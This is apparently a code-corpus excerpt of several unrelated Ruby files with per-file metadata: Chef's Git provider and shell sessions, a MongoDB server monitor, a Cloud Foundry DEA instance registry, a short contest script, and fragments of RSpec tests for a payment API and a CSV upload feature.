is_r_n: false, # 구매자가 상품명 입력 허용할지 말지
is_r_p: false, # 구매자가 가격 입력 허용할지 말지
is_addr: false, # 주소창 추가 할지 말지
is_da: false, # 배송비 추가 할지 말지
is_memo: false, # 구매자로부터 메모를 받을 지
tfp: 0, # 비과세 금액
ip: 10000, # 아이템 판매금액
dp: 0, # 디스플레이용 가격, 할인전 가격을 의미함, 쿠폰이나 프로모션에 의한 가격 디스카운트 개념 필요 - 페이코 때문에 생긴 개념
dap: 0, # 기본배송비
dap_jj: 0, # 제주 배송비
dap_njj: 0 # 제주 외 지역 도서산간 추가비용
},
{
# st: 1, #1: sms, 2:lms, 3:mms, 4:알림톡, 5:친구톡
# rps: ['010-1234-5678', '010-1111-2222'], # 받는 사람 전화번호
# sp: '010-1234-1111', # 보내는 사람 전화번호
# msg: '테스트 문자입니다'
}
)
expect(result).not_to be_empty
expect(result[:status]).to eq(200)
# print result
end
end | 40.275 | 105 | 0.387958 |
1c0b9f562e344a61b1126d35e384b6526bdb3bca | 16,607 | #
# Author:: Daniel DeLeo (<[email protected]>)
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../exceptions"
require_relative "../log"
require_relative "../provider"
require "fileutils" unless defined?(FileUtils)
class Chef
class Provider
class Git < Chef::Provider
extend Forwardable
provides :git
GIT_VERSION_PATTERN = Regexp.compile('git version (\d+\.\d+.\d+)')
def_delegator :new_resource, :destination, :cwd
def load_current_resource
@resolved_reference = nil
@current_resource = Chef::Resource::Git.new(new_resource.name)
if current_revision = find_current_revision
current_resource.revision current_revision
end
end
def define_resource_requirements
unless new_resource.user.nil?
requirements.assert(:all_actions) do |a|
a.assertion do
get_homedir(new_resource.user)
rescue ArgumentError
false
end
a.whyrun("User #{new_resource.user} does not exist, this run will fail unless it has been previously created. Assuming it would have been created.")
a.failure_message(Chef::Exceptions::User, "#{new_resource.user} required by resource #{new_resource.name} does not exist")
end
end
# Parent directory of the target must exist.
requirements.assert(:checkout, :sync) do |a|
dirname = ::File.dirname(cwd)
a.assertion { ::File.directory?(dirname) }
a.whyrun("Directory #{dirname} does not exist, this run will fail unless it has been previously created. Assuming it would have been created.")
a.failure_message(Chef::Exceptions::MissingParentDirectory,
"Cannot clone #{new_resource} to #{cwd}, the enclosing directory #{dirname} does not exist")
end
requirements.assert(:all_actions) do |a|
a.assertion { !(new_resource.revision =~ %r{^origin/}) }
a.failure_message Chef::Exceptions::InvalidRemoteGitReference,
"Deploying remote branches is not supported. " +
"Specify the remote branch as a local branch for " +
"the git repository you're deploying from " +
"(ie: '#{new_resource.revision.gsub("origin/", "")}' rather than '#{new_resource.revision}')."
end
requirements.assert(:all_actions) do |a|
# this can't be recovered from in why-run mode, because nothing that
# we do in the course of a run is likely to create a valid target_revision
# if we can't resolve it up front.
a.assertion { !target_revision.nil? }
a.failure_message Chef::Exceptions::UnresolvableGitReference,
"Unable to parse SHA reference for '#{new_resource.revision}' in repository '#{new_resource.repository}'. " +
"Verify your (case-sensitive) repository URL and revision.\n" +
"`git ls-remote '#{new_resource.repository}' '#{rev_search_pattern}'` output: #{@resolved_reference}"
end
end
action :checkout do
if target_dir_non_existent_or_empty?
clone
if new_resource.enable_checkout
checkout
end
enable_submodules
add_remotes
else
logger.debug "#{new_resource} checkout destination #{cwd} already exists or is a non-empty directory"
end
end
action :export do
action_checkout
converge_by("complete the export by removing #{cwd}.git after checkout") do
FileUtils.rm_rf(::File.join(cwd, ".git"))
end
end
action :sync do
if existing_git_clone?
logger.trace "#{new_resource} current revision: #{current_resource.revision} target revision: #{target_revision}"
unless current_revision_matches_target_revision?
fetch_updates
enable_submodules
logger.info "#{new_resource} updated to revision #{target_revision}"
end
add_remotes
else
action_checkout
end
end
def git_has_single_branch_option?
@git_has_single_branch_option ||= !git_gem_version.nil? && git_gem_version >= Gem::Version.new("1.7.10")
end
def git_gem_version
return @git_gem_version if defined?(@git_gem_version)
output = git("--version").stdout
match = GIT_VERSION_PATTERN.match(output)
if match
@git_gem_version = Gem::Version.new(match[1])
else
logger.warn "Unable to parse git version from '#{output}'"
@git_gem_version = nil
end
@git_gem_version
end
def existing_git_clone?
::File.exist?(::File.join(cwd, ".git"))
end
def target_dir_non_existent_or_empty?
!::File.exist?(cwd) || Dir.entries(cwd).sort == [".", ".."]
end
def find_current_revision
logger.trace("#{new_resource} finding current git revision")
if ::File.exist?(::File.join(cwd, ".git"))
# 128 is returned when we're not in a git repo. this is fine
result = git("rev-parse", "HEAD", cwd: cwd, returns: [0, 128]).stdout.strip
end
sha_hash?(result) ? result : nil
end
def already_on_target_branch?
current_branch = git("rev-parse", "--abbrev-ref", "HEAD", cwd: cwd, returns: [0, 128]).stdout.strip
current_branch == (new_resource.checkout_branch || new_resource.revision)
end
def add_remotes
if new_resource.additional_remotes.length > 0
new_resource.additional_remotes.each_pair do |remote_name, remote_url|
converge_by("add remote #{remote_name} from #{remote_url}") do
logger.info "#{new_resource} adding git remote #{remote_name} = #{remote_url}"
setup_remote_tracking_branches(remote_name, remote_url)
end
end
end
end
def clone
converge_by("clone from #{repo_url} into #{cwd}") do
remote = new_resource.remote
clone_cmd = ["clone"]
clone_cmd << "-o #{remote}" unless remote == "origin"
clone_cmd << "--depth #{new_resource.depth}" if new_resource.depth
clone_cmd << "--no-single-branch" if new_resource.depth && git_has_single_branch_option?
clone_cmd << "\"#{new_resource.repository}\""
clone_cmd << "\"#{cwd}\""
logger.info "#{new_resource} cloning repo #{repo_url} to #{cwd}"
git clone_cmd
end
end
def checkout
converge_by("checkout ref #{target_revision} branch #{new_resource.revision}") do
# checkout into a local branch rather than a detached HEAD
if new_resource.checkout_branch
# check out to a local branch
git("branch", "-f", new_resource.checkout_branch, target_revision, cwd: cwd)
git("checkout", new_resource.checkout_branch, cwd: cwd)
logger.info "#{new_resource} checked out branch: #{new_resource.revision} onto: #{new_resource.checkout_branch} reference: #{target_revision}"
elsif sha_hash?(new_resource.revision) || !is_branch?
# detached head
git("checkout", target_revision, cwd: cwd)
logger.info "#{new_resource} checked out reference: #{target_revision}"
elsif already_on_target_branch?
# we are already on the proper branch
git("reset", "--hard", target_revision, cwd: cwd)
else
# need a branch with a tracking branch
git("branch", "-f", new_resource.revision, target_revision, cwd: cwd)
git("checkout", new_resource.revision, cwd: cwd)
git("branch", "-u", "#{new_resource.remote}/#{new_resource.revision}", cwd: cwd)
logger.info "#{new_resource} checked out branch: #{new_resource.revision} reference: #{target_revision}"
end
end
end
def enable_submodules
if new_resource.enable_submodules
converge_by("enable git submodules for #{new_resource}") do
logger.info "#{new_resource} synchronizing git submodules"
git("submodule", "sync", cwd: cwd)
logger.info "#{new_resource} enabling git submodules"
# the --recursive flag means we require git 1.6.5+ now, see CHEF-1827
git("submodule", "update", "--init", "--recursive", cwd: cwd)
end
end
end
def fetch_updates
setup_remote_tracking_branches(new_resource.remote, new_resource.repository)
converge_by("fetch updates for #{new_resource.remote}") do
# since we're in a local branch already, just reset to specified revision rather than merge
logger.trace "Fetching updates from #{new_resource.remote} and resetting to revision #{target_revision}"
git("fetch", "--prune", new_resource.remote, cwd: cwd)
git("fetch", new_resource.remote, "--tags", cwd: cwd)
if sha_hash?(new_resource.revision) || is_tag? || already_on_target_branch?
# detached head or if we are already on the proper branch
git("reset", "--hard", target_revision, cwd: cwd)
elsif new_resource.checkout_branch
# check out to a local branch
git("branch", "-f", new_resource.checkout_branch, target_revision, cwd: cwd)
git("checkout", new_resource.checkout_branch, cwd: cwd)
else
# need a branch with a tracking branch
git("branch", "-f", new_resource.revision, target_revision, cwd: cwd)
git("checkout", new_resource.revision, cwd: cwd)
git("branch", "-u", "#{new_resource.remote}/#{new_resource.revision}", cwd: cwd)
end
end
end
def setup_remote_tracking_branches(remote_name, remote_url)
converge_by("set up remote tracking branches for #{remote_url} at #{remote_name}") do
logger.trace "#{new_resource} configuring remote tracking branches for repository #{remote_url} " + "at remote #{remote_name}"
check_remote_command = ["config", "--get", "remote.#{remote_name}.url"]
remote_status = git(check_remote_command, cwd: cwd, returns: [0, 1, 2])
case remote_status.exitstatus
when 0, 2
# * Status 0 means that we already have a remote with this name, so we should update the url
# if it doesn't match the url we want.
# * Status 2 means that we have multiple urls assigned to the same remote (not a good idea)
# which we can fix by replacing them all with our target url (hence the --replace-all option)
if multiple_remotes?(remote_status) || !remote_matches?(remote_url, remote_status)
git("config", "--replace-all", "remote.#{remote_name}.url", %{"#{remote_url}"}, cwd: cwd)
end
when 1
git("remote", "add", remote_name, remote_url, cwd: cwd)
end
end
end
def multiple_remotes?(check_remote_command_result)
check_remote_command_result.exitstatus == 2
end
def remote_matches?(remote_url, check_remote_command_result)
check_remote_command_result.stdout.strip.eql?(remote_url)
end
def current_revision_matches_target_revision?
(!current_resource.revision.nil?) && (target_revision.strip.to_i(16) == current_resource.revision.strip.to_i(16))
end
def target_revision
@target_revision ||=
if sha_hash?(new_resource.revision)
@target_revision = new_resource.revision
else
@target_revision = remote_resolve_reference
end
end
alias :revision_slug :target_revision
def remote_resolve_reference
logger.trace("#{new_resource} resolving remote reference")
# The sha pointed to by an annotated tag is identified by the
# '^{}' suffix appended to the tag. In order to resolve
# annotated tags, we have to search for "revision*" and
# post-process. Special handling for 'HEAD' to ignore a tag
# named 'HEAD'.
@resolved_reference = git_ls_remote(rev_search_pattern)
refs = @resolved_reference.split("\n").map { |line| line.split("\t") }
# First try for ^{} indicating the commit pointed to by an
# annotated tag.
# It is possible for a user to create a tag named 'HEAD'.
# Using such a degenerate annotated tag would be very
# confusing. We avoid the issue by disallowing the use of
# annotated tags named 'HEAD'.
if rev_search_pattern != "HEAD"
found = find_revision(refs, new_resource.revision, "^{}")
else
found = refs_search(refs, "HEAD")
end
found = find_revision(refs, new_resource.revision) if found.empty?
found.size == 1 ? found.first[0] : nil
end
def find_revision(refs, revision, suffix = "")
found = refs_search(refs, rev_match_pattern("refs/tags/", revision) + suffix)
if !found.empty?
@is_tag = true
found
else
found = refs_search(refs, rev_match_pattern("refs/heads/", revision) + suffix)
if !found.empty?
@is_branch = true
found
else
refs_search(refs, revision + suffix)
end
end
end
def rev_match_pattern(prefix, revision)
if revision.start_with?(prefix)
revision
else
prefix + revision
end
end
def rev_search_pattern
if ["", "HEAD"].include? new_resource.revision
"HEAD"
else
new_resource.revision + "*"
end
end
def git_ls_remote(rev_pattern)
git("ls-remote", "\"#{new_resource.repository}\"", "\"#{rev_pattern}\"").stdout
end
def refs_search(refs, pattern)
refs.find_all { |m| m[1] == pattern }
end
alias git_minor_version git_gem_version
private
def is_branch?
!!@is_branch
end
def is_tag?
!!@is_tag
end
def run_options(run_opts = {})
env = {}
if new_resource.user
run_opts[:user] = new_resource.user
# Certain versions of `git` misbehave if git configuration is
# inaccessible in $HOME. We need to ensure $HOME matches the
# user who is executing `git` not the user running Chef.
env["HOME"] = get_homedir(new_resource.user)
end
run_opts[:group] = new_resource.group if new_resource.group
env["GIT_SSH"] = new_resource.ssh_wrapper if new_resource.ssh_wrapper
run_opts[:log_tag] = new_resource.to_s
run_opts[:timeout] = new_resource.timeout if new_resource.timeout
env.merge!(new_resource.environment) if new_resource.environment
run_opts[:environment] = env unless env.empty?
run_opts
end
def git(*args, **run_opts)
git_command = ["git", args].compact.join(" ")
logger.trace "running #{git_command}"
shell_out!(git_command, **run_options(run_opts))
end
def sha_hash?(string)
string =~ /^[0-9a-f]{40}$/
end
# Returns a message for sensitive repository URL if sensitive is true otherwise
# repository URL is returned
# @return [String]
def repo_url
if new_resource.sensitive
"**Suppressed Sensitive URL**"
else
new_resource.repository
end
end
# Returns the home directory of the user
# @param [String] user must be a string.
# @return [String] the home directory of the user.
#
def get_homedir(user)
require "etc" unless defined?(Etc)
case user
when Integer
Etc.getpwuid(user).dir
else
Etc.getpwnam(user.to_s).dir
end
end
end
end
end
| 39.167453 | 160 | 0.622569 |
38b77568a3905c30d672b5afc80c85043035887b | 5,317 | # Copyright (C) 2014-2015 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'mongo/server/monitor/connection'
module Mongo
class Server
# This object is responsible for keeping server status up to date, running in
# a separate thread as to not disrupt other operations.
#
# @since 2.0.0
class Monitor
include Loggable
# The default time for a server to refresh its status is 10 seconds.
#
# @since 2.0.0
HEARTBEAT_FREQUENCY = 10.freeze
# The minimum time between forced server scans. Is
# minHeartbeatFrequencyMS in the SDAM spec.
#
# @since 2.0.0
MIN_SCAN_FREQUENCY = 0.5.freeze
# The command used for determining server status.
#
# @since 2.0.0
STATUS = { :ismaster => 1 }.freeze
# The constant for the ismaster command.
#
# @since 2.0.0
ISMASTER = Protocol::Query.new(Database::ADMIN, Database::COMMAND, STATUS, :limit => -1)
# The weighting factor (alpha) for calculating the average moving round trip time.
#
# @since 2.0.0
RTT_WEIGHT_FACTOR = 0.2.freeze
# @return [ Mongo::Connection ] connection The connection to use.
attr_reader :connection
# @return [ Server::Description ] description The server
# description the monitor refreshes.
attr_reader :description
# @return [ Description::Inspector ] inspector The description inspector.
attr_reader :inspector
# @return [ Hash ] options The server options.
attr_reader :options
# Force the monitor to immediately do a check of its server.
#
# @example Force a scan.
# monitor.scan!
#
# @return [ Description ] The updated description.
#
# @since 2.0.0
def scan!
throttle_scan_frequency!
@description = inspector.run(description, *ismaster)
end
# Get the refresh interval for the server. This will be defined via an option
# or will default to 5.
#
# @example Get the refresh interval.
# server.heartbeat_frequency
#
# @return [ Integer ] The heartbeat frequency, in seconds.
#
# @since 2.0.0
def heartbeat_frequency
@heartbeat_frequency ||= options[:heartbeat_frequency] || HEARTBEAT_FREQUENCY
end
# Create the new server monitor.
#
# @example Create the server monitor.
# Mongo::Server::Monitor.new(address, listeners)
#
# @param [ Address ] address The address to monitor.
# @param [ Event::Listeners ] listeners The event listeners.
# @param [ Hash ] options The options.
#
# @since 2.0.0
def initialize(address, listeners, options = {})
@description = Description.new(address, {})
@inspector = Description::Inspector.new(listeners)
@options = options.freeze
@connection = Connection.new(address, options)
@last_round_trip_time = nil
@mutex = Mutex.new
end
# Runs the server monitor. Refreshing happens on a separate thread per
# server.
#
# @example Run the monitor.
# monito.run
#
# @return [ Thread ] The thread the monitor runs on.
#
# @since 2.0.0
def run!
@thread = Thread.new(heartbeat_frequency) do |i|
loop do
sleep(i)
scan!
end
end
end
# Stops the server monitor. Kills the thread so it doesn't continue
# taking memory and sending commands to the connection.
#
# @example Stop the monitor.
# monitor.stop!
#
# @return [ Boolean ] Is the Thread stopped?
#
# @since 2.0.0
def stop!
@thread.kill && @thread.stop?
end
private
def average_round_trip_time(start)
new_rtt = Time.now - start
RTT_WEIGHT_FACTOR * new_rtt + (1 - RTT_WEIGHT_FACTOR) * (@last_round_trip_time || new_rtt)
end
def calculate_average_round_trip_time(start)
@last_round_trip_time = average_round_trip_time(start)
end
def ismaster
@mutex.synchronize do
start = Time.now
begin
result = connection.dispatch([ ISMASTER ]).documents[0]
return result, calculate_average_round_trip_time(start)
rescue Exception => e
log_debug([ e.message ])
return {}, calculate_average_round_trip_time(start)
end
end
end
def throttle_scan_frequency!
if @last_scan
difference = (Time.now - @last_scan)
throttle_time = (MIN_SCAN_FREQUENCY - difference)
sleep(throttle_time) if throttle_time > 0
end
@last_scan = Time.now
end
end
end
end
| 30.039548 | 98 | 0.621215 |
4ae5418391b2e8e2021a487b898e24ce57894d43 | 8,552 | # coding: UTF-8
require "steno"
require "steno/core_ext"
require "sys/filesystem"
require "thread"
require "dea/loggregator"
require "dea/registry_enumeration"
module Dea
class InstanceRegistry
DEFAULT_CRASH_LIFETIME_SECS = 60 * 60
CRASHES_REAPER_INTERVAL_SECS = 10
DEFAULT_STOPPING_LIFETIME_SECS = 60
include Enumerable
include RegistryEnumeration
attr_reader :config
attr_reader :crash_lifetime_secs
def initialize(config = {})
@config = config
@instances = {}
@instances_by_app_id = {}
@crash_lifetime_secs = config["crash_lifetime_secs"] || DEFAULT_CRASH_LIFETIME_SECS
end
def start_reaper
EM.add_periodic_timer(CRASHES_REAPER_INTERVAL_SECS) do
reap_orphaned_crashes
reap_crashes
reap_crashes_under_disk_pressure
reap_stopping
end
end
def register(instance)
app_id = instance.application_id
Dea::Loggregator.emit(app_id,
"Starting app instance (index #{instance.instance_index}) with guid #{instance.application_id}")
logger.debug2("Registering instance #{instance.instance_id}")
add_instance(instance)
end
def unregister(instance)
app_id = instance.application_id
Dea::Loggregator.emit(app_id,
"Stopping app instance (index #{instance.instance_index}) with guid #{instance.application_id}")
logger.debug2("Stopping instance #{instance.instance_id}")
remove_instance(instance)
logger.debug2("Stopped instance #{instance.instance_id}")
Dea::Loggregator.emit(app_id,
"Stopped app instance (index #{instance.instance_index}) with guid #{instance.application_id}")
end
def change_instance_id(instance)
remove_instance(instance)
instance.change_instance_id!
add_instance(instance)
end
def instances_for_application(app_id)
@instances_by_app_id[app_id] || {}
end
def lookup_instance(instance_id)
@instances[instance_id]
end
def to_hash
@instances_by_app_id.each.with_object({}) do |(app_id, instances), hash|
hash[app_id] =
instances.each.with_object({}) do |(id, instance), is|
is[id] = instance.attributes_and_stats
end
end
end
def app_id_to_count
app_count = {}
@instances_by_app_id.each do |app_id, instance_hash|
app_count[app_id] = instance_hash.size
end
app_count
end
def each(&block)
@instances.each_value(&block)
end
def instances
@instances.values
end
def empty?
@instances.empty?
end
def size
@instances.size
end
def reap_orphaned_crashes
logger.debug2("Reaping orphaned crashes")
crashes = Dir[File.join(config.crashes_path, "*")].map do |path|
if File.directory?(path)
File.basename(path)
end
end
crashes.compact.each do |instance_id|
instance = lookup_instance(instance_id)
# Reap if this instance is not referenced
if instance.nil?
reap_crash(instance_id, "orphaned")
end
end
end
def reap_stopping
logger.debug2("Reaping stopping")
stopping_by_app = Hash.new { |h, k| h[k] = [] }
select(&:stopping?).each { |i| stopping_by_app[i.application_id] << i }
now = Time.now.to_i
stopping_by_app.each do |app_id, instances|
instances.each_with_index do |instance, idx|
secs_since_stopping = now - instance.state_timestamp
if (secs_since_stopping > DEFAULT_STOPPING_LIFETIME_SECS)
instance.stop do |error|
logger.warn("Failed to reap stopping #{instance}: #{error}") if error
end
end
end
end
end
def reap_crashes
logger.debug2("Reaping crashes")
crashes_by_app = Hash.new { |h, k| h[k] = [] }
select(&:crashed?).each { |i| crashes_by_app[i.application_id] << i }
now = Time.now.to_i
crashes_by_app.each do |app_id, instances|
# Most recent crashes first
instances.sort! { |a, b| b.state_timestamp <=> a.state_timestamp }
instances.each_with_index do |instance, idx|
secs_since_crash = now - instance.state_timestamp
# Remove if not most recent, or too old
if (idx > 0) || (secs_since_crash > crash_lifetime_secs)
reap_crash(instance.instance_id, "stale")
end
end
end
end
def reap_crashes_under_disk_pressure
logger.debug2("Reaping crashes under disk pressure")
if disk_pressure?
instance = select { |i| i.crashed? }.
sort_by { |i| i.state_timestamp }.
first
# Remove oldest crash
if instance
reap_crash(instance.instance_id, "disk pressure") do
# Continue reaping crashes when done
reap_crashes_under_disk_pressure
end
end
end
end
def reap_crash(instance_id, reason = nil, &blk)
instance = lookup_instance(instance_id)
data = {
:instance_id => instance_id,
:reason => reason,
}
if instance
data[:application_id] = instance.application_id
data[:application_version] = instance.application_version
data[:application_name] = instance.application_name
end
message = "Removing crash #{instance_id}"
logger.debug(message, data)
Dea::Loggregator.emit(data[:application_id], "Removing crash for app with id #{data[:application_id]}")
t = Time.now
destroy_crash_artifacts(instance_id) do
logger.debug(message + ": took %.3fs" % (Time.now - t), data)
blk.call if blk
end
unregister(instance) if instance
end
def destroy_crash_artifacts(instance_id, &callback)
crash_path = File.join(config.crashes_path, instance_id)
return if crash_path.nil?
operation = lambda do
logger.debug2("Removing path #{crash_path}")
begin
FileUtils.rm_rf(crash_path)
rescue => e
logger.log_exception(e)
end
end
EM.defer(operation, callback)
end
def disk_pressure?
r = false
begin
stat = Sys::Filesystem.stat(config.crashes_path)
block_usage_ratio = Float(stat.blocks - stat.blocks_free) / Float(stat.blocks)
inode_usage_ratio = Float(stat.files - stat.files_free) / Float(stat.files)
r ||= block_usage_ratio > config.crash_block_usage_ratio_threshold
r ||= inode_usage_ratio > config.crash_inode_usage_ratio_threshold
if r
logger.debug("Disk usage (block/inode): %.3f/%.3f" % [block_usage_ratio, inode_usage_ratio])
end
rescue => e
logger.log_exception(e)
end
r
end
def instances_filtered_by_message(message)
app_id = message.data["droplet"].to_s
logger.debug2("Filter message for app_id: %s" % app_id, app_id: app_id)
instances = instances_for_application(app_id)
if instances.empty?
logger.debug2("No instances found for app_id: %s" % app_id, app_id: app_id)
return
end
make_set = lambda { |key| Set.new(message.data.fetch(key, [])) }
version = message.data["version"]
instance_ids = make_set.call("instances") | make_set.call("instance_ids")
indices = make_set.call("indices")
states = make_set.call("states").map { |e| Dea::Instance::State.from_external(e) }
instances.each do |_, instance|
next if version && (instance.application_version != version)
next if instance_ids.any? && !instance_ids.include?(instance.instance_id)
next if indices.any? && !indices.include?(instance.instance_index)
next if states.any? && !states.include?(instance.state)
yield(instance)
end
end
private
def add_instance(instance)
@instances[instance.instance_id] = instance
app_id = instance.application_id
@instances_by_app_id[app_id] ||= {}
@instances_by_app_id[app_id][instance.instance_id] = instance
nil
end
def remove_instance(instance)
@instances.delete(instance.instance_id)
app_id = instance.application_id
if @instances_by_app_id.has_key?(app_id)
@instances_by_app_id[app_id].delete(instance.instance_id)
if @instances_by_app_id[app_id].empty?
@instances_by_app_id.delete(app_id)
end
end
nil
end
end
end
| 27.235669 | 109 | 0.643592 |
287cf0c166f0255fe2880e02b7b449d2672a4065 | 8,101 | #--
# Author:: Daniel DeLeo (<[email protected]>)
# Author:: Tim Hinderliter (<[email protected]>)
# Copyright:: Copyright (c) 2009 Daniel DeLeo
# Copyright:: Copyright (c) 2011 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef/recipe'
require 'chef/run_context'
require 'chef/config'
require 'chef/client'
require 'chef/cookbook/cookbook_collection'
require 'chef/cookbook_loader'
require 'chef/run_list/run_list_expansion'
require 'chef/formatters/base'
require 'chef/formatters/doc'
require 'chef/formatters/minimal'
module Shell
class ShellSession
include Singleton
def self.session_type(type=nil)
@session_type = type if type
@session_type
end
attr_accessor :node, :compile, :recipe, :run_context
attr_reader :node_attributes, :client
def initialize
@node_built = false
formatter = Chef::Formatters.new(Chef::Config.formatter, STDOUT, STDERR)
@events = Chef::EventDispatch::Dispatcher.new(formatter)
end
def node_built?
!!@node_built
end
def reset!
loading do
rebuild_node
@node = client.node
shorten_node_inspect
Shell::Extensions.extend_context_node(@node)
rebuild_context
node.consume_attributes(node_attributes) if node_attributes
@recipe = Chef::Recipe.new(nil, nil, run_context)
Shell::Extensions.extend_context_recipe(@recipe)
@node_built = true
end
end
def node_attributes=(attrs)
@node_attributes = attrs
@node.consume_attributes(@node_attributes)
end
def resource_collection
run_context.resource_collection
end
def run_context
@run_context ||= rebuild_context
end
def definitions
nil
end
def cookbook_loader
nil
end
def save_node
raise "Not Supported! #{self.class.name} doesn't support #save_node, maybe you need to run chef-shell in client mode?"
end
def rebuild_context
raise "Not Implemented! :rebuild_collection should be implemented by subclasses"
end
private
def loading
show_loading_progress
begin
yield
rescue => e
loading_complete(false)
raise e
else
loading_complete(true)
end
end
def show_loading_progress
print "Loading"
@loading = true
@dot_printer = Thread.new do
while @loading
print "."
sleep 0.5
end
end
end
def loading_complete(success)
@loading = false
@dot_printer.join
msg = success ? "done.\n\n" : "epic fail!\n\n"
print msg
end
def shorten_node_inspect
def @node.inspect
"<Chef::Node:0x#{self.object_id.to_s(16)} @name=\"#{self.name}\">"
end
end
def rebuild_node
raise "Not Implemented! :rebuild_node should be implemented by subclasses"
end
end
class StandAloneSession < ShellSession
session_type :standalone
def rebuild_context
cookbook_collection = Chef::CookbookCollection.new({})
@run_context = Chef::RunContext.new(@node, cookbook_collection, @events) # no recipes
@run_context.load(Chef::RunList::RunListExpansionFromDisk.new("_default", [])) # empty recipe list
end
private
def rebuild_node
Chef::Config[:solo] = true
@client = Chef::Client.new
@client.run_ohai
@client.load_node
@client.build_node
end
end
class SoloSession < ShellSession
session_type :solo
def definitions
@run_context.definitions
end
def rebuild_context
@run_status = Chef::RunStatus.new(@node, @events)
Chef::Cookbook::FileVendor.on_create { |manifest| Chef::Cookbook::FileSystemFileVendor.new(manifest, Chef::Config[:cookbook_path]) }
cl = Chef::CookbookLoader.new(Chef::Config[:cookbook_path])
cl.load_cookbooks
cookbook_collection = Chef::CookbookCollection.new(cl)
@run_context = Chef::RunContext.new(node, cookbook_collection, @events)
@run_context.load(Chef::RunList::RunListExpansionFromDisk.new("_default", []))
@run_status.run_context = run_context
end
private
def rebuild_node
# Tell the client we're chef solo so it won't try to contact the server
Chef::Config[:solo] = true
@client = Chef::Client.new
@client.run_ohai
@client.load_node
@client.build_node
end
end
class ClientSession < SoloSession
session_type :client
def save_node
@client.save_node
end
def rebuild_context
@run_status = Chef::RunStatus.new(@node, @events)
Chef::Cookbook::FileVendor.on_create { |manifest| Chef::Cookbook::RemoteFileVendor.new(manifest, Chef::REST.new(Chef::Config[:server_url])) }
cookbook_hash = @client.sync_cookbooks
cookbook_collection = Chef::CookbookCollection.new(cookbook_hash)
@run_context = Chef::RunContext.new(node, cookbook_collection, @events)
@run_context.load(Chef::RunList::RunListExpansionFromAPI.new("_default", []))
@run_status.run_context = run_context
end
private
def rebuild_node
# Make sure the client knows this is not chef solo
Chef::Config[:solo] = false
@client = Chef::Client.new
@client.run_ohai
@client.register
@client.load_node
@client.build_node
end
end
class DoppelGangerClient < Chef::Client
attr_reader :node_name
def initialize(node_name)
@node_name = node_name
@ohai = Ohai::System.new
end
# Run the very smallest amount of ohai we can get away with and still
# hope to have things work. Otherwise we're not very good doppelgangers
def run_ohai
@ohai.require_plugin('os')
end
# DoppelGanger implementation of build_node. preserves as many of the node's
# attributes, and does not save updates to the server
def build_node
Chef::Log.debug("Building node object for #{@node_name}")
@node = Chef::Node.find_or_create(node_name)
ohai_data = @ohai.data.merge(@node.automatic_attrs)
@node.consume_external_attrs(ohai_data,nil)
@run_list_expansion = @node.expand!('server')
@expanded_run_list_with_versions = @run_list_expansion.recipes.with_version_constraints_strings
Chef::Log.info("Run List is [#{@node.run_list}]")
Chef::Log.info("Run List expands to [#{@expanded_run_list_with_versions.join(', ')}]")
@node
end
def register
@rest = Chef::REST.new(Chef::Config[:chef_server_url], Chef::Config[:node_name], Chef::Config[:client_key])
end
end
class DoppelGangerSession < ClientSession
session_type "doppelganger client"
def save_node
puts "A doppelganger should think twice before saving the node"
end
def assume_identity(node_name)
Chef::Config[:doppelganger] = @node_name = node_name
reset!
rescue Exception => e
puts "#{e.class.name}: #{e.message}"
puts Array(e.backtrace).join("\n")
puts
puts "* " * 40
puts "failed to assume the identity of node '#{node_name}', resetting"
puts "* " * 40
puts
Chef::Config[:doppelganger] = false
@node_built = false
Shell.session
end
def rebuild_node
# Make sure the client knows this is not chef solo
Chef::Config[:solo] = false
@client = DoppelGangerClient.new(@node_name)
@client.run_ohai
@client.register
@client.load_node
@client.build_node
@client.sync_cookbooks
end
end
end
| 27.093645 | 147 | 0.673621 |
21465d9e98ecba607ae9058f6f0c1025bf264d97 | 377 | #
# File : B.rb
# Author : Kazune Takahashi
# Created : 2018-11-4 16:38:39
# Powered by Visual Studio Code
#
x = gets.to_i
ok = Array.new(1010){false}
ok[0] = ok[1] = true
for i in 2...1010 do
for j in 2...1010 do
if i ** j < 1010
ok[i ** j] = true;
else
break
end
end
end
for i in 0...1010 do
if ok[x - i]
puts x - i
exit
end
end | 13.962963 | 31 | 0.546419 |
d5b4e95b0b46ed272e8c07cb8327717a833430a5 | 3,511 | require 'rails_helper'
describe "upload UntaggedAnimalAssessment category", type: :feature do
let(:user) { create(:user) }
let(:valid_file) { "#{Rails.root}/db/sample_data_files/untagged_animal_assessment/Untagged_assessment_03122018.csv" }
let(:invalid_file) { "#{Rails.root}/spec/support/csv/invalid_headers.csv" }
let(:incomplete_data_file) { "#{Rails.root}/spec/support/csv/Untagged_assessment_03122018-invalid-rows.csv" }
let(:expected_success_message) { 'Successfully queued spreadsheet for import' }
let(:temporary_file) { create(:temporary_file, contents: File.read(valid_file)) }
before do
sign_in user
visit new_file_upload_path
end
context 'when user successfully uploads a CSV with no errors' do
it "creates new ProcessedFile record with 'Processed' status " do
upload_file("Untagged Animal Assessment", valid_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Processed"
expect(processed_file.job_errors).to eq(nil)
expect(processed_file.job_stats).to eq(
{
"row_count" => 250,
"rows_imported" => 250,
